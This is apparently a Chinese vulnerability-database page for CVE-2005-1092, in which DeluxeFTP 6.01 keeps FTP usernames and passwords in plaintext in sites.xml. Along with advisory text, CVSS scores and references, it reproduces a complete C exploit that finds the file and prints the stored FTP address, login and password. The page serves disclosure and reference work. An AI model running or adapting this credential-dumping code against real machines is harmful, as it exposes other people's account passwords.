CVE-2005-1092
CVSS7.2
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:48:11
NMCOES    

[原文]Lightspeed DeluxeFTP 6.01 stores usernames and passwords in plaintext in sites.xml, which is world-readable, which allows local users to gain privileges.


[CNNVD]Light Speed Technologies DeluxeFTP本地认证证书泄露漏洞(CNNVD-200505-647)

        Lightspeed DeluxeFTP 6.01在sites.xml中以纯文本形式存储用户名和密码,且是全域可读的,本地用户可借此获取权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:light_speed_technology:deluxeftp:7.0.1_beta
cpe:/a:light_speed_technology:deluxeftp:6.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1092
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1092
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-647
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/13105
(UNKNOWN)  BID  13105
http://www.osvdb.org/15421
(UNKNOWN)  OSVDB  15421
http://secunia.com/advisories/14923
(VENDOR_ADVISORY)  SECUNIA  14923
http://lostmon.blogspot.com/2005/04/deluxeftp-plain-text-passwords.html
(VENDOR_ADVISORY)  MISC  http://lostmon.blogspot.com/2005/04/deluxeftp-plain-text-passwords.html

- 漏洞信息

Light Speed Technologies DeluxeFTP本地认证证书泄露漏洞
高危 访问验证错误
2005-05-02 00:00:00 2005-10-20 00:00:00
本地  
        Lightspeed DeluxeFTP 6.01在sites.xml中以纯文本形式存储用户名和密码,且是全域可读的,本地用户可借此获取权限。

- 公告与补丁

        暂无数据

- 漏洞信息 (936)

DeluxeFtp 6.x Local Password Disclosure Exploit (EDBID:936)
windows local
2005-04-13 Verified
0 Kozan
N/A [点击下载]
/*******************************************************************

DeluxeFtp 6.x Local Password Disclosure Exploit by Kozan

Application: DeluxeFtp 6.x (and probably prior versions)
Vendor: www.deluxeftp.com
Vulnerable Description: DeluxeFtp 6.x discloses passwords
to local users.

Bug Discovered by: Lostmon
Exploit Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*******************************************************************/

#include <stdio.h>
#include <string.h>
#include <windows.h>


HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


int adresal(char *FilePath,char *Str)
{
char kr;
int Sayac=0;
int Offset=-1;
FILE *di;
di=fopen(FilePath,"rb");

if( di == NULL )
{
fclose(di);
return -1;
}

while(!feof(di))
{
Sayac++;
for(int i=0;i<strlen(Str);i++)
{
kr=getc(di);
if(kr != Str[i])
{
if( i>0 )
{
fseek(di,Sayac+1,SEEK_SET);
}
break;
}
if( i > ( strlen(Str)-2 ) )
{
Offset = ftell(di)-strlen(Str);
fclose(di);
return Offset;
}
}
}
fclose(di);
return -1;
}


char *oku(char *FilePath,char *Str)
{

FILE *di;
char cr;
int i=0;
char Feature[500];

int Offset = adresal(FilePath,Str);

if( Offset == -1 )
return "";

if( (di=fopen(FilePath,"rb")) == NULL )
return "";

fseek(di,Offset+strlen(Str),SEEK_SET);

while(!feof(di))
{
cr=getc(di);
if(cr == '<')
break;
Feature[i] = cr;
i++;
}

Feature[i] = '\0';
fclose(di);
return Feature;
}




int main()
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{

lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen);

if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
{
RegCloseKey(hKey);
printf("An error occured!\n");
exit(1);
}

RegCloseKey(hKey);

}
else
{
RegCloseKey(hKey);
printf("An error occured!\n");
exit(1);
}

strcat(prgfiles,"\\DeluxeFTP\\sites.xml");


printf("DeluxeFtp 6.x Local Password Disclosure Exploit by Kozan\n");
printf("Bug Discovered by Lostmon\n");
printf("Exploit coded by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com \n\n");
printf("This exploit only shows the first profile and its password.\n");
printf("You may improve it freely...\n\n");

char FtpAddress[BUFSIZE], FtpUsername[BUFSIZE], FtpPassword[BUFSIZE];

strcpy(FtpAddress,oku(prgfiles,"<ADDRESS>"));
strcpy(FtpUsername,oku(prgfiles,"<LOGIN>"));
strcpy(FtpPassword,oku(prgfiles,"<PASSWORD>"));

printf("Ftp Address : %s\n",FtpAddress);
printf("Ftp Username : %s\n",FtpUsername);
printf("Ftp Password : %s\n",FtpPassword);

return 0;
}

// milw0rm.com [2005-04-13]
		

- 漏洞信息

15421
DeluxeFTP sites.xml Cleartext Password Disclosure
Local Access Required Authentication Management, Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

DeluxeFTP contains a flaw that may lead to an unauthorized information. It is possible to gain access to the plain text username and password of the FTP sites configured when the program writes its configuration to the sites.xml file, which may lead to a loss of confidentiality

- 时间线

2005-04-11 2005-04-09
2005-04-11 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Light Speed Technologies DeluxeFTP Local Authentication Credentials Disclosure Vulnerability
Access Validation Error 13105
No Yes
2005-04-12 12:00:00 2009-07-12 12:56:00
Lostmon is credited with the discovery of this issue.

- 受影响的程序版本

Light Speed Technology DeluxeFTP 6.0 1

- 漏洞讨论

A local authentication credentials disclosure vulnerability affects Light Speed Technologies DeluxeFTP. This issue is due to a failure of the application to properly secure authentication credentials by default.

An attacker may leverage this issue to gain access to authentication credentials for all FTP accounts stored in the offending file.

- 漏洞利用

No exploit is required to leverage this issue.

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站